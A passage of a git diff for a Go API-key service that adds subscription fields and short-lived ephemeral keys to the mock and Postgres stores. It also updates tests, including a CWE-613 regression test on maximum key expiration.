-		Groups:   groups, // Original user groups for subscription-based authorization
+		Valid:        true,
+		UserID:       metadata.Username,
+		Username:     metadata.Username,
+		KeyID:        metadata.ID,
+		Groups:       groups, // Original user groups for subscription-based authorization
+		Subscription: metadata.Subscription,
 	}, nil
 }
 
diff --git a/maas-api/internal/api_keys/service_test.go b/maas-api/internal/api_keys/service_test.go
index 6fce7814c..97eba4e69 100644
--- a/maas-api/internal/api_keys/service_test.go
+++ b/maas-api/internal/api_keys/service_test.go
@@ -11,13 +11,27 @@ import (
 	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/api_keys"
 	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/config"
 	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/logger"
+	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/subscription"
 )
 
+type serviceTestSubSelector struct{}
+
+func (serviceTestSubSelector) Select(_ []string, _ string, requested string, _ string) (*subscription.SelectResponse, error) {
+	if requested != "" {
+		return &subscription.SelectResponse{Name: requested}, nil
+	}
+	return &subscription.SelectResponse{Name: "default-sub"}, nil
+}
+
+func (serviceTestSubSelector) SelectHighestPriority(_ []string, _ string) (*subscription.SelectResponse, error) {
+	return &subscription.SelectResponse{Name: "default-sub"}, nil
+}
+
 func createTestService(t *testing.T) (*api_keys.Service, *api_keys.MockStore) {
 	t.Helper()
 	store := api_keys.NewMockStore()
 	cfg := &config.Config{}
-	svc := api_keys.NewServiceWithLogger(store, cfg, logger.Development())
+	svc := api_keys.NewServiceWithLogger(store, cfg, serviceTestSubSelector{}, logger.Development())
 	return svc, store
 }
 
@@ -35,7 +49,7 @@ func TestValidateAPIKey_ValidKey(t *testing.T) {
 	username := "alice"
 	groups := []string{"tier-premium", "system:authenticated"}
 
-	err := store.AddKey(ctx, username, keyID, hash, "Test Key", "", groups, nil)
+	err := store.AddKey(ctx, username, keyID, hash, "Test Key", "", groups, "default-sub", nil, false)
 	require.NoError(t, err)
 
 	// Validate the key
@@ -48,6 +62,7 @@ func TestValidateAPIKey_ValidKey(t *testing.T) {
 	assert.Equal(t, username, result.Username)
 	assert.Equal(t, keyID, result.KeyID)
 	assert.Equal(t, groups, result.Groups)
+	assert.Equal(t, "default-sub", result.Subscription)
 }
 
 func TestValidateAPIKey_InvalidFormat(t *testing.T) {
@@ -98,7 +113,7 @@ func TestValidateAPIKey_RevokedKey(t *testing.T) {
 	username := "bob"
 	groups := []string{"tier-free"}
 
-	err := store.AddKey(ctx, username, keyID, hash, "Revoked Key", "", groups, nil)
+	err := store.AddKey(ctx, username, keyID, hash, "Revoked Key", "", groups, "default-sub", nil, false)
 	require.NoError(t, err)
 
 	// Revoke the key
@@ -125,7 +140,7 @@ func TestValidateAPIKey_ExpiredKey(t *testing.T) {
 	groups := []string{"tier-basic"}
 	expiresAt := time.Now().Add(-24 * time.Hour) // Expired 1 day ago
 
-	err := store.AddKey(ctx, username, keyID, hash, "Expired Key", "", groups, &expiresAt)
+	err := store.AddKey(ctx, username, keyID, hash, "Expired Key", "", groups, "default-sub", &expiresAt, false)
 	require.NoError(t, err)
 
 	// Validate the expired key
@@ -146,7 +161,7 @@ func TestValidateAPIKey_EmptyGroups(t *testing.T) {
 	plainKey, hash := createTestAPIKey(t)
 	username := "dave"
 
-	err := store.AddKey(ctx, username, keyID, hash, "No Groups Key", "", nil, nil)
+	err := store.AddKey(ctx, username, keyID, hash, "No Groups Key", "", nil, "default-sub", nil, false)
 	require.NoError(t, err)
 
 	// Validate the key
@@ -170,7 +185,7 @@ func TestValidateAPIKey_UpdatesLastUsed(t *testing.T) {
 	username := "eve"
 	groups := []string{"tier-enterprise"}
 
-	err := store.AddKey(ctx, username, keyID, hash, "Last Used Test", "", groups, nil)
+	err := store.AddKey(ctx, username, keyID, hash, "Last Used Test", "", groups, "default-sub", nil, false)
 	require.NoError(t, err)
 
 	// Get initial metadata (last_used_at should be empty/nil)
@@ -206,7 +221,7 @@ func TestGetAPIKey(t *testing.T) {
 	username := "alice"
 	keyName := "Alice's Key"
 
-	err := store.AddKey(ctx, username, keyID, hash, keyName, "Test description", nil, nil)
+	err := store.AddKey(ctx, username, keyID, hash, keyName, "Test description", nil, "default-sub", nil, false)
 	require.NoError(t, err)
 
 	// Get via service layer
@@ -238,7 +253,7 @@ func TestRevokeAPIKey(t *testing.T) {
 	_, hash := createTestAPIKey(t)
 	username := "bob"
 
-	err := store.AddKey(ctx, username, keyID, hash, "Revoke Test", "", nil, nil)
+	err := store.AddKey(ctx, username, keyID, hash, "Revoke Test", "", nil, "default-sub", nil, false)
 	require.NoError(t, err)
 
 	// Verify it's active
@@ -256,32 +271,6 @@ func TestRevokeAPIKey(t *testing.T) {
 	assert.Equal(t, api_keys.StatusRevoked, meta.Status)
 }
 
-func TestServiceList(t *testing.T) {
-	ctx := context.Background()
-	svc, store := createTestService(t)
-
-	// Create multiple keys for user
-	username := "charlie"
-	for i := 1; i <= 3; i++ {
-		keyID := "list-test-key-" + string(rune('0'+i))
-		_, hash := createTestAPIKey(t)
-		err := store.AddKey(ctx, username, keyID, hash, "Key "+string(rune('0'+i)), "", nil, nil)
-		require.NoError(t, err)
-	}
-
-	// List via service layer
-	params := api_keys.PaginationParams{
-		Limit:  10,
-		Offset: 0,
-	}
-	result, err := svc.List(ctx, username, params, []string{api_keys.TokenStatusActive})
-	require.NoError(t, err)
-	require.NotNil(t, result)
-
-	assert.Len(t, result.Keys, 3, "Should return all 3 keys")
-	assert.False(t, result.HasMore, "Should not have more results")
-}
-
 // ============================================================
 // MAX EXPIRATION VALIDATION TESTS
 // ============================================================
@@ -294,11 +283,11 @@ func TestCreateAPIKey_MaxExpirationLimit(t *testing.T) {
 		cfg := &config.Config{
 			APIKeyMaxExpirationDays: 30, // 30 days max
 		}
-		svc := api_keys.NewServiceWithLogger(store, cfg, logger.Development())
+		svc := api_keys.NewServiceWithLogger(store, cfg, serviceTestSubSelector{}, logger.Development())
 
 		// Request 7 days - should succeed
 		expiresIn := 7 * 24 * time.Hour
-		result, err := svc.CreateAPIKey(ctx, "alice", []string{"users"}, "Test Key", "", &expiresIn)
+		result, err := svc.CreateAPIKey(ctx, "alice", []string{"users"}, "Test Key", "", &expiresIn, false, "")
 
 		require.NoError(t, err)
 		require.NotNil(t, result)
@@ -310,11 +299,11 @@ func TestCreateAPIKey_MaxExpirationLimit(t *testing.T) {
 		cfg := &config.Config{
 			APIKeyMaxExpirationDays: 30, // 30 days max
 		}
-		svc := api_keys.NewServiceWithLogger(store, cfg, logger.Development())
+		svc := api_keys.NewServiceWithLogger(store, cfg, serviceTestSubSelector{}, logger.Development())
 
 		// Request 60 days - should fail
 		expiresIn := 60 * 24 * time.Hour
-		result, err := svc.CreateAPIKey(ctx, "alice", []string{"users"}, "Test Key", "", &expiresIn)
+		result, err := svc.CreateAPIKey(ctx, "alice", []string{"users"}, "Test Key", "", &expiresIn, false, "")
 
 		require.Error(t, err)
 		assert.Nil(t, result)
@@ -327,11 +316,11 @@ func TestCreateAPIKey_MaxExpirationLimit(t *testing.T) {
 		cfg := &config.Config{
 			APIKeyMaxExpirationDays: 30, // 30 days max
 		}
-		svc := api_keys.NewServiceWithLogger(store, cfg, logger.Development())
+		svc := api_keys.NewServiceWithLogger(store, cfg, serviceTestSubSelector{}, logger.Development())
 
 		// Request exactly 30 days - should succeed
 		expiresIn := 30 * 24 * time.Hour
-		result, err := svc.CreateAPIKey(ctx, "alice", []string{"users"}, "Test Key", "", &expiresIn)
+		result, err := svc.CreateAPIKey(ctx, "alice", []string{"users"}, "Test Key", "", &expiresIn, false, "")
 
 		require.NoError(t, err)
 		require.NotNil(t, result)
@@ -342,13 +331,263 @@ func TestCreateAPIKey_MaxExpirationLimit(t *testing.T) {
 		cfg := &config.Config{
 			APIKeyMaxExpirationDays: 30, // 30 days max
 		}
-		svc := api_keys.NewServiceWithLogger(store, cfg, logger.Development())
+		svc := api_keys.NewServiceWithLogger(store, cfg, serviceTestSubSelector{}, logger.Development())
+
+		// No expiration requested - should default to APIKeyMaxExpirationDays (30 days)
+		result, err := svc.CreateAPIKey(ctx, "alice", []string{"users"}, "Test Key", "", nil, false, "")
+
+		require.NoError(t, err)
+		require.NotNil(t, result)
+		require.NotNil(t, result.ExpiresAt, "should default to max expiration when not provided")
+	})
+
+	// Regression test for CWE-613: ensure default max is enforced when config is nil/zero
+	t.Run("DefaultConfigEnforcesMaxExpiration", func(t *testing.T) {
+		store := api_keys.NewMockStore()
+		// nil config or zero APIKeyMaxExpirationDays should fall back to DefaultAPIKeyMaxExpirationDays (90 days)
+		svc := api_keys.NewServiceWithLogger(store, nil, serviceTestSubSelector{}, logger.Development())
+
+		// Request 365 days - should fail because default max is 90 days
+		expiresIn := 365 * 24 * time.Hour
+		result, err := svc.CreateAPIKey(ctx, "alice", []string{"users"}, "Test Key", "", &expiresIn, false, "")
+
+		require.Error(t, err, "should reject expiration exceeding default max (90 days)")
+		assert.Nil(t, result)
+		require.ErrorIs(t, err, api_keys.ErrExpirationExceedsMax)
+		assert.Contains(t, err.Error(), "90 days")
+	})
+
+	t.Run("ZeroConfigEnforcesDefaultMax", func(t *testing.T) {
+		store := api_keys.NewMockStore()
+		// Config with APIKeyMaxExpirationDays=0 should fall back to default
+		cfg := &config.Config{
+			APIKeyMaxExpirationDays: 0,
+		}
+		svc := api_keys.NewServiceWithLogger(store, cfg, serviceTestSubSelector{}, logger.Development())
+
+		// Request 365 days - should fail because default max is 90 days
+		expiresIn := 365 * 24 * time.Hour
+		result, err := svc.CreateAPIKey(ctx, "alice", []string{"users"}, "Test Key", "", &expiresIn, false, "")
+
+		require.Error(t, err, "should reject expiration exceeding default max (90 days)")
+		assert.Nil(t, result)
+		require.ErrorIs(t, err, api_keys.ErrExpirationExceedsMax)
+	})
+}
+
+// ============================================================
+// EPHEMERAL KEY EXPIRATION TESTS
+// ============================================================
+
+// assertExpirationWithinTolerance verifies that expiresAt is within tolerance of expectedDuration from now.
+func assertExpirationWithinTolerance(t *testing.T, expiresAtStr string, expectedDuration time.Duration, now time.Time) {
+	t.Helper()
+	expiresAt, err := time.Parse(time.RFC3339, expiresAtStr)
+	require.NoError(t, err)
+
+	expectedExpiry := now.Add(expectedDuration)
+	diff := expiresAt.Sub(expectedExpiry).Abs()
+	assert.LessOrEqual(t, diff, 5*time.Second,
+		"expiration should be ~%v from now, got diff: %v", expectedDuration, diff)
+}
+
+func TestEphemeralKeyExpiration(t *testing.T) {
+	ctx := context.Background()
 
-		// Request permanent key (nil expiration) - should succeed (max limit only applies to expiring keys)
-		result, err := svc.CreateAPIKey(ctx, "alice", []string{"users"}, "Test Key", "", nil)
+	t.Run("DefaultExpirationIsOneHour", func(t *testing.T) {
+		svc := api_keys.NewServiceWithLogger(api_keys.NewMockStore(), &config.Config{}, serviceTestSubSelector{}, logger.Development())
+		now := time.Now().UTC()
+
+		result, err := svc.CreateAPIKey(ctx, "user", []string{"users"}, "ephemeral-test", "", nil, true, "")
+
+		require.NoError(t, err)
+		require.NotNil(t, result)
+		assert.True(t, result.Ephemeral)
+		require.NotNil(t, result.ExpiresAt)
+		assertExpirationWithinTolerance(t, *result.ExpiresAt, 1*time.Hour, now)
+	})
+
+	t.Run("CustomExpirationWithinLimit", func(t *testing.T) {
+		svc := api_keys.NewServiceWithLogger(api_keys.NewMockStore(), &config.Config{}, serviceTestSubSelector{}, logger.Development())
+		expiresIn := 30 * time.Minute
+		now := time.Now().UTC()
+
+		result, err := svc.CreateAPIKey(ctx, "user", []string{"users"}, "short-lived", "", &expiresIn, true, "")
+
+		require.NoError(t, err)
+		require.NotNil(t, result)
+		require.NotNil(t, result.ExpiresAt)
+		assertExpirationWithinTolerance(t, *result.ExpiresAt, 30*time.Minute, now)
+	})
+
+	t.Run("ExactlyOneHour", func(t *testing.T) {
+		svc := api_keys.NewServiceWithLogger(api_keys.NewMockStore(), &config.Config{}, serviceTestSubSelector{}, logger.Development())
+		expiresIn := 1 * time.Hour
+
+		result, err := svc.CreateAPIKey(ctx, "user", []string{"users"}, "exactly-one-hour", "", &expiresIn, true, "")
 
 		require.NoError(t, err)
 		require.NotNil(t, result)
+		assert.True(t, result.Ephemeral)
+	})
+
+	// Table-driven tests for invalid expiration cases
+	invalidExpirationTests := []struct {
+		name        string
+		expiresIn   time.Duration
+		expectedErr error
+		errContains string
+	}{
+		{
+			name:        "ExceedsOneHourLimit",
+			expiresIn:   2 * time.Hour,
+			expectedErr: api_keys.ErrExpirationExceedsMax,
+			errContains: "cannot exceed 1 hour",
+		},
+		{
+			name:        "ZeroExpiration",
+			expiresIn:   0,
+			expectedErr: api_keys.ErrExpirationNotPositive,
+			errContains: "must be positive",
+		},
+		{
+			name:        "NegativeExpiration",
+			expiresIn:   -1 * time.Hour,
+			expectedErr: api_keys.ErrExpirationNotPositive,
+			errContains: "must be positive",
+		},
+	}
+
+	for _, tt := range invalidExpirationTests {
+		t.Run(tt.name, func(t *testing.T) {
+			svc := api_keys.NewServiceWithLogger(api_keys.NewMockStore(), &config.Config{}, serviceTestSubSelector{}, logger.Development())
+			expiresIn := tt.expiresIn
+
+			result, err := svc.CreateAPIKey(ctx, "user", []string{"users"}, "test-key", "", &expiresIn, true, "")
+
+			require.Error(t, err)
+			assert.Nil(t, result)
+			require.ErrorIs(t, err, tt.expectedErr)
+			assert.Contains(t, err.Error(), tt.errContains)
+		})
+	}
+}
+
+// subSelectorStub implements api_keys.SubscriptionSelector for CreateAPIKey subscription tests.
+type subSelectorStub struct {
+	selectErr          error
+	highestPriorityErr error
+	// highestName is returned by SelectHighestPriority on success; empty defaults to "from-priority".
+	highestName string
+}
+
+func (s subSelectorStub) Select(_ []string, _ string, requested string, _ string) (*subscription.SelectResponse, error) {
+	if s.selectErr != nil {
+		return nil, s.selectErr
+	}
+	return &subscription.SelectResponse{Name: requested}, nil
+}
+
+func (s subSelectorStub) SelectHighestPriority(_ []string, _ string) (*subscription.SelectResponse, error) {
+	if s.highestPriorityErr != nil {
+		return nil, s.highestPriorityErr
+	}
+	name := s.highestName
+	if name == "" {
+		name = "from-priority"
+	}
+	return &subscription.SelectResponse{Name: name}, nil
+}
+
+func TestCreateAPIKey_Subscription(t *testing.T) {
+	ctx := context.Background()
+	cfg := &config.Config{}
+	user := "u"
+	groups := []string{"g"}
+
+	t.Run("stores_explicit_subscription_name", func(t *testing.T) {
+		store := api_keys.NewMockStore()
+		svc := api_keys.NewServiceWithLogger(store, cfg, subSelectorStub{}, logger.Development())
+
+		result, err := svc.CreateAPIKey(ctx, user, groups, "key", "", nil, false, "team-a")
+		require.NoError(t, err)
+		require.Equal(t, "team-a", result.Subscription)
+
+		meta, err := store.Get(ctx, result.ID)
+		require.NoError(t, err)
+		require.Equal(t, "team-a", meta.Subscription)
+	})
+
+	t.Run("defaults_to_highest_priority_when_omitted", func(t *testing.T) {
+		store := api_keys.NewMockStore()
+		svc := api_keys.NewServiceWithLogger(store, cfg, subSelectorStub{}, logger.Development())
+
+		result, err := svc.CreateAPIKey(ctx, user, groups, "key", "", nil, false, "")
+		require.NoError(t, err)
+		require.Equal(t, "from-priority", result.Subscription)
+	})
+
+	t.Run("selector_errors_do_not_persist_key", func(t *testing.T) {
+		errTests := []struct {
+			name      string
+			stub      subSelectorStub
+			requested string
+			assertErr func(*testing.T, error)
+		}{
+			{
+				name: "subscription_not_found",
+				stub: subSelectorStub{
+					selectErr: &subscription.SubscriptionNotFoundError{Subscription: "missing-sub"},
+				},
+				requested: "missing-sub",
+				assertErr: func(t *testing.T, err error) {
+					t.Helper()
+					var target *subscription.SubscriptionNotFoundError
+					require.ErrorAs(t, err, &target)
+				},
+			},
+			{
+				name: "subscription_access_denied",
+				stub: subSelectorStub{
+					selectErr: &subscription.AccessDeniedError{Subscription: "denied-sub"},
+				},
+				requested: "denied-sub",
+				assertErr: func(t *testing.T, err error) {
+					t.Helper()
+					var target *subscription.AccessDeniedError
+					require.ErrorAs(t, err, &target)
+				},
+			},
+			{
+				name: "no_accessible_subscription",
+				stub: subSelectorStub{
+					highestPriorityErr: &subscription.NoSubscriptionError{},
+				},
+				requested: "",
+				assertErr: func(t *testing.T, err error) {
+					t.Helper()
+					var target *subscription.NoSubscriptionError
+					require.ErrorAs(t, err, &target)
+				},
+			},
+		}
+
+		for _, tt := range errTests {
+			t.Run(tt.name, func(t *testing.T) {
+				store := api_keys.NewMockStore()
+				svc := api_keys.NewServiceWithLogger(store, cfg, tt.stub, logger.Development())
+
+				result, err := svc.CreateAPIKey(ctx, user, groups, "key", "", nil, false, tt.requested)
+				require.Error(t, err)
+				require.Nil(t, result)
+				tt.assertErr(t, err)
+
+				res, sErr := store.Search(ctx, user, &api_keys.SearchFilters{}, &api_keys.SortParams{By: api_keys.DefaultSortBy, Order: api_keys.DefaultSortOrder},
+					&api_keys.PaginationParams{Limit: 10, Offset: 0})
+				require.NoError(t, sErr)
+				assert.Empty(t, res.Keys)
+			})
+		}
 	})
 }
 
diff --git a/maas-api/internal/api_keys/store_interface.go b/maas-api/internal/api_keys/store_interface.go
index 0c55839d2..49b9928a1 100644
--- a/maas-api/internal/api_keys/store_interface.go
+++ b/maas-api/internal/api_keys/store_interface.go
@@ -12,6 +12,10 @@ var (
 	ErrInvalidKey    = errors.New("api key is invalid or revoked")
 	ErrEmptyJTI      = errors.New("key ID is required and cannot be empty")
 	ErrEmptyName     = errors.New("key name is required and cannot be empty")
+
+	// Expiration validation errors.
+	ErrExpirationNotPositive = errors.New("expiration must be positive")
+	ErrExpirationExceedsMax  = errors.New("expiration exceeds maximum allowed")
 )
 
 // Legacy constants for backward compatibility with database operations.
@@ -25,18 +29,19 @@ const (
 type MetadataStore interface {
 	// AddKey stores an API key with hash-only storage (no plaintext).
 	// Keys can be permanent (expiresAt=nil) or expiring (expiresAt set).
-	// userGroups is an array of user's groups (used for authorization).
+	//
+	// Parameters:
+	//   - keyID: Database UUID/JTI (primary key), distinct from the embedded salt in the API key
+	//   - keyHash: SHA-256(embedded_key_id + "\x00" + secret), where embedded_key_id is the
+	//     per-key salt encoded in the API key format (sk-oai-{embedded_key_id}_{secret})
+	//   - userGroups: array of user's groups (used for authorization)
+	//   - ephemeral: marks the key as short-lived for programmatic use
+	//
 	// Note: keyPrefix is NOT stored (security - reduces brute-force attack surface).
-	AddKey(ctx context.Context, username string, keyID, keyHash, name, description string, userGroups []string, expiresAt *time.Time) error
-
-	// List returns a paginated list of API keys with optional filtering.
-	// Pagination is mandatory - no unbounded queries allowed.
-	// username can be empty (admin viewing all users) or specific username.
-	// statuses can filter by status (active, revoked, expired) - empty means all statuses.
-	List(ctx context.Context, username string, params PaginationParams, statuses []string) (*PaginatedResult, error)
+	AddKey(ctx context.Context, username string, keyID, keyHash, name, description string, userGroups []string, subscription string, expiresAt *time.Time, ephemeral bool) error
 
-	// Search returns API keys matching the search criteria
-	// Supports filtering, sorting, and pagination
+	// Search returns API keys matching the search criteria.
+	// Supports filtering, sorting, and pagination.
 	Search(
 		ctx context.Context,
 		username string,
@@ -47,8 +52,10 @@ type MetadataStore interface {
 
 	Get(ctx context.Context, jti string) (*ApiKey, error)
 
-	// GetByHash looks up an API key by its SHA-256 hash (for Authorino validation)
-	// Returns ErrKeyNotFound if key doesn't exist, ErrInvalidKey if revoked
+	// GetByHash looks up an API key by its SHA-256 hash (for Authorino validation).
+	// Hash is computed as SHA-256(embedded_key_id + "\x00" + secret) where embedded_key_id
+	// is the per-key salt encoded in the API key format (sk-oai-{embedded_key_id}_{secret}).
+	// Returns ErrKeyNotFound if key doesn't exist, ErrInvalidKey if revoked or expired.
 	GetByHash(ctx context.Context, keyHash string) (*ApiKey, error)
 
 	// InvalidateAll marks all active tokens for a user as revoked.
@@ -58,8 +65,8 @@ type MetadataStore interface {
 	// Revoke marks a specific API key as revoked (status transition: active → revoked).
 	Revoke(ctx context.Context, keyID string) error
 
-	// UpdateLastUsed updates the last_used_at timestamp for an API key
-	// Called after successful validation to track key usage
+	// UpdateLastUsed updates the last_used_at timestamp for an API key.
+	// Called after successful validation to track key usage.
 	UpdateLastUsed(ctx context.Context, keyID string) error
 
 	Close() error
diff --git a/maas-api/internal/api_keys/store_mock.go b/maas-api/internal/api_keys/store_mock.go
index 6f22761d7..6ca5f6767 100644
--- a/maas-api/internal/api_keys/store_mock.go
+++ b/maas-api/internal/api_keys/store_mock.go
@@ -23,6 +23,7 @@ type storedKey struct {
 	keyHash    string
 	expiresAt  time.Time
 	lastUsedAt *time.Time
+	ephemeral  bool
 }
 
 // NewMockStore creates a new in-memory mock store for testing.
@@ -37,14 +38,20 @@ var _ MetadataStore = (*MockStore)(nil)
 
 // AddKey stores an API key with hash-only storage (no plaintext).
 // Keys can be permanent (expiresAt=nil) or expiring (expiresAt set).
+// ephemeral marks the key as short-lived for programmatic use.
 // Note: keyPrefix is NOT stored (security - reduces brute-force attack surface).
-func (m *MockStore) AddKey(ctx context.Context, username, keyID, keyHash, name, description string, userGroups []string, expiresAt *time.Time) error {
+func (m *MockStore) AddKey(
+	ctx context.Context, username, keyID, keyHash, name, description string, userGroups []string, subscription string, expiresAt *time.Time, ephemeral bool,
+) error {
 	if keyID == "" {
 		return ErrEmptyJTI
 	}
 	if name == "" {
 		return ErrEmptyName
 	}
+	if subscription == "" {
+		return errors.New("subscription is required")
+	}
 
 	m.mu.Lock()
 	defer m.mu.Unlock()
@@ -60,13 +67,16 @@ func (m *MockStore) AddKey(ctx context.Context, username, keyID, keyHash, name,
 			ID:           keyID,
 			Name:         name,
 			Description:  description,
+			Subscription: subscription,
 			Groups:       userGroups,
 			Status:       StatusActive,
 			CreationDate: time.Now().UTC().Format(time.RFC3339),
+			Ephemeral:    ephemeral,
 		},
 		username:  username,
 		keyHash:   keyHash,
 		expiresAt: expiresAtTime,
+		ephemeral: ephemeral,
 	}
 
 	return nil
@@ -76,6 +86,7 @@ func (m *MockStore) AddKey(ctx context.Context, username, keyID, keyHash, name,
 // Pagination is mandatory - no unbounded queries allowed.
 // username can be empty (all users) or specific username.
 // statuses can filter by status - empty means all statuses.
+// Note: Ephemeral keys are excluded by default (use Search with IncludeEphemeral for full control).
 func (m *MockStore) List(ctx context.Context, username string, params PaginationParams, statuses []string) (*PaginatedResult, error) {
 	// Validate params (same as PostgresStore)
 	if params.Limit < 1 || params.Limit > 100 {
@@ -93,6 +104,11 @@ func (m *MockStore) List(ctx context.Context, username string, params Pagination
 	now := time.Now().UTC()
 
 	for _, k := range m.keys {
+		// Exclude ephemeral keys by default
+		if k.ephemeral {
+			continue
+		}
+
 		// Filter by username (empty = all users)
 		if username != "" && k.username != username {
 			continue
@@ -148,11 +164,16 @@ func (m *MockStore) List(ctx context.Context, username string, params Pagination
 	}, nil
 }
 
-// filterKeys applies username and status filters to API keys.
-func (m *MockStore) filterKeys(username string, statusFilters []string, now time.Time) []ApiKey {
+// filterKeys applies username, status, and ephemeral filters to API keys.
+func (m *MockStore) filterKeys(username string, statusFilters []string, includeEphemeral bool, now time.Time) []ApiKey {
 	filtered := make([]ApiKey, 0, len(m.keys))
 
 	for _, k := range m.keys {
+		// Filter ephemeral keys unless explicitly included
+		if !includeEphemeral && k.ephemeral {
+			continue
+		}
+
 		// Filter by username
 		if username != "" && k.username != username {
 			continue
@@ -287,6 +308,7 @@ func applyPagination(keys []ApiKey, offset, limit int) ([]ApiKey, bool) {
 }
 
 // Search implements flexible API key search with filtering, sorting, pagination.
+// Ephemeral keys are excluded by default unless IncludeEphemeral filter is set to true.
 func (m *MockStore) Search(
 	ctx context.Context,
 	username string,
@@ -305,9 +327,12 @@ func (m *MockStore) Search(
 	m.mu.RLock()
 	defer m.mu.RUnlock()
 
-	// Filter keys by username and status
+	// Determine if ephemeral keys should be included
+	includeEphemeral := filters.IncludeEphemeral != nil && *filters.IncludeEphemeral
+
+	// Filter keys by username, status, and ephemeral
 	now := time.Now().UTC()
-	allKeys := m.filterKeys(username, filters.Status, now)
+	allKeys := m.filterKeys(username, filters.Status, includeEphemeral, now)
 
 	// Sort keys
 	sort.Slice(allKeys, func(i, j int) bool {
diff --git a/maas-api/internal/api_keys/store_postgres.go b/maas-api/internal/api_keys/store_postgres.go
index 8ab6d4c80..5cb79de71 100644
--- a/maas-api/internal/api_keys/store_postgres.go
+++ b/maas-api/internal/api_keys/store_postgres.go
@@ -37,8 +37,17 @@ func NewPostgresStore(db *sql.DB, log *logger.Logger) *PostgresStore {
 
 // AddKey stores an API key with hash-only storage (no plaintext).
 // Keys can be permanent (expiresAt=nil) or expiring (expiresAt set).
+// ephemeral marks the key as short-lived for programmatic use.
+//
+// Note on naming: keyID parameter is the database UUID/JTI (primary key), distinct from
+// the embedded_key_id salt in the API key format. The keyHash is computed as
+// SHA-256(embedded_key_id + "\x00" + secret), where embedded_key_id is encoded in the
+// API key string (sk-oai-{embedded_key_id}_{secret}).
+//
 // Note: keyPrefix is NOT stored (security - reduces brute-force attack surface).
-func (s *PostgresStore) AddKey(ctx context.Context, username, keyID, keyHash, name, description string, userGroups []string, expiresAt *time.Time) error {
+func (s *PostgresStore) AddKey(
+	ctx context.Context, username, keyID, keyHash, name, description string, userGroups []string, subscription string, expiresAt *time.Time, ephemeral bool,
+) error {
 	if keyID == "" {
 		return ErrEmptyJTI
 	}
@@ -48,21 +57,24 @@ func (s *PostgresStore) AddKey(ctx context.Context, username, keyID, keyHash, na
 	if keyHash == "" {
 		return errors.New("key hash is required")
 	}
+	if subscription == "" {
+		return errors.New("subscription is required")
+	}
 	if userGroups == nil {
 		userGroups = []string{}
 	}
 
 	query := `
-		INSERT INTO api_keys (id, username, name, description, key_hash, user_groups, status, created_at, expires_at)
-		VALUES ($1, $2, $3, $4, $5, $6, 'active', $7, $8)
+		INSERT INTO api_keys (id, username, name, description, key_hash, user_groups, subscription, status, created_at, expires_at, ephemeral)
+		VALUES ($1, $2, $3, $4, $5, $6, $7, 'active', $8, $9, $10)
 	`
 	// Use pq.Array to handle PostgreSQL TEXT[] type
-	_, err := s.db.ExecContext(ctx, query, keyID, username, name, description, keyHash, pq.Array(userGroups), time.Now().UTC(), expiresAt)
+	_, err := s.db.ExecContext(ctx, query, keyID, username, name, description, keyHash, pq.Array(userGroups), subscription, time.Now().UTC(), expiresAt, ephemeral)
 	if err != nil {
 		return fmt.Errorf("failed to insert API key: %w", err)
 	}
 
-	s.logger.Debug("Stored API key", "id", keyID, "user", username)
+	s.logger.Debug("Stored API key", "id", keyID, "user", username, "ephemeral", ephemeral)
 	return nil
 }
 
@@ -71,6 +83,7 @@ func (s *PostgresStore) AddKey(ctx context.Context, username, keyID, keyHash, na
 // Fetches limit+1 items to efficiently determine if more pages exist.
 // username can be empty (admin viewing all users) or specific username.
 // statuses can filter by status (active, revoked, expired) - empty means all statuses.
+// Note: Ephemeral keys are excluded by default (use Search with IncludeEphemeral for full control).
 func (s *PostgresStore) List(ctx context.Context, username string, params PaginationParams, statuses []string) (*PaginatedResult, error) {
 	// Validate params
 	if params.Limit < 1 || params.Limit > 100 {
@@ -85,6 +98,9 @@ func (s *PostgresStore) List(ctx context.Context, username string, params Pagina
 	var args []any
 	argPos := 1
 
+	// Exclude ephemeral keys by default
+	whereClauses = append(whereClauses, "ephemeral = FALSE")
+
 	if username != "" {
 		whereClauses = append(whereClauses, fmt.Sprintf("username = $%d", argPos))
 		args = append(args, username)
@@ -111,7 +127,7 @@ func (s *PostgresStore) List(ctx context.Context, username string, params Pagina
 
 	//nolint:gosec // Dynamic WHERE clause is safe - uses parameterized queries
 	query := fmt.Sprintf(`
-		SELECT id, name, description, created_at, expires_at, status, last_used_at
+		SELECT id, name, description, subscription, created_at, expires_at, status, last_used_at, ephemeral
 		FROM api_keys
 		%s
 		ORDER BY created_at DESC
@@ -133,7 +149,7 @@ func (s *PostgresStore) List(ctx context.Context, username string, params Pagina
 		var expiresAt, lastUsedAt sql.NullTime
 		var description sql.NullString
 
-		if err := rows.Scan(&k.ID, &k.Name, &description, &createdAt, &expiresAt, &k.Status, &lastUsedAt); err != nil {
+		if err := rows.Scan(&k.ID, &k.Name, &description, &k.Subscription, &createdAt, &expiresAt, &k.Status, &lastUsedAt, &k.Ephemeral); err != nil {
 			return nil, fmt.Errorf("failed to scan row: %w", err)
 		}
 
@@ -169,6 +185,7 @@ func (s *PostgresStore) List(ctx context.Context, username string, params Pagina
 }
 
 // Search implements flexible API key search with filtering, sorting, pagination.
+// Ephemeral keys are excluded by default unless IncludeEphemeral filter is set to true.
 func (s *PostgresStore) Search(
 	ctx context.Context,
 	username string,
@@ -189,6 +206,11 @@ func (s *PostgresStore) Search(
 	var args []any
 	argPos := 1
 
+	// Exclude ephemeral keys by default
+	if filters.IncludeEphemeral == nil || !*filters.IncludeEphemeral {
+		whereClauses = append(whereClauses, "ephemeral = FALSE")
+	}
+
 	// Filter by username
 	if username != "" {
 		whereClauses = append(whereClauses, fmt.Sprintf("username = $%d", argPos))
@@ -230,7 +252,7 @@ func (s *PostgresStore) Search(
 
 	//nolint:gosec // Dynamic ORDER BY is safe - sort.By/Order validated against allowlist in handler
 	query := fmt.Sprintf(`
-		SELECT id, name, description, created_at, expires_at, status, last_used_at
+		SELECT id, name, description, subscription, username, created_at, expires_at, status, last_used_at, ephemeral
 		FROM api_keys
 		%s
 		%s
@@ -256,10 +278,13 @@ func (s *PostgresStore) Search(
 			&key.ID,
 			&key.Name,
 			&description,
+			&key.Subscription,
+			&key.Username,
 			&createdAt,
 			&expiresAt,
 			&key.Status,
 			&lastUsedAt,
+			&key.Ephemeral,
 		)
 		if err != nil {
 			return nil, fmt.Errorf("failed to scan API key: %w", err)
@@ -301,7 +326,7 @@ func (s *PostgresStore) Search(
 // Get retrieves a single API key by ID.
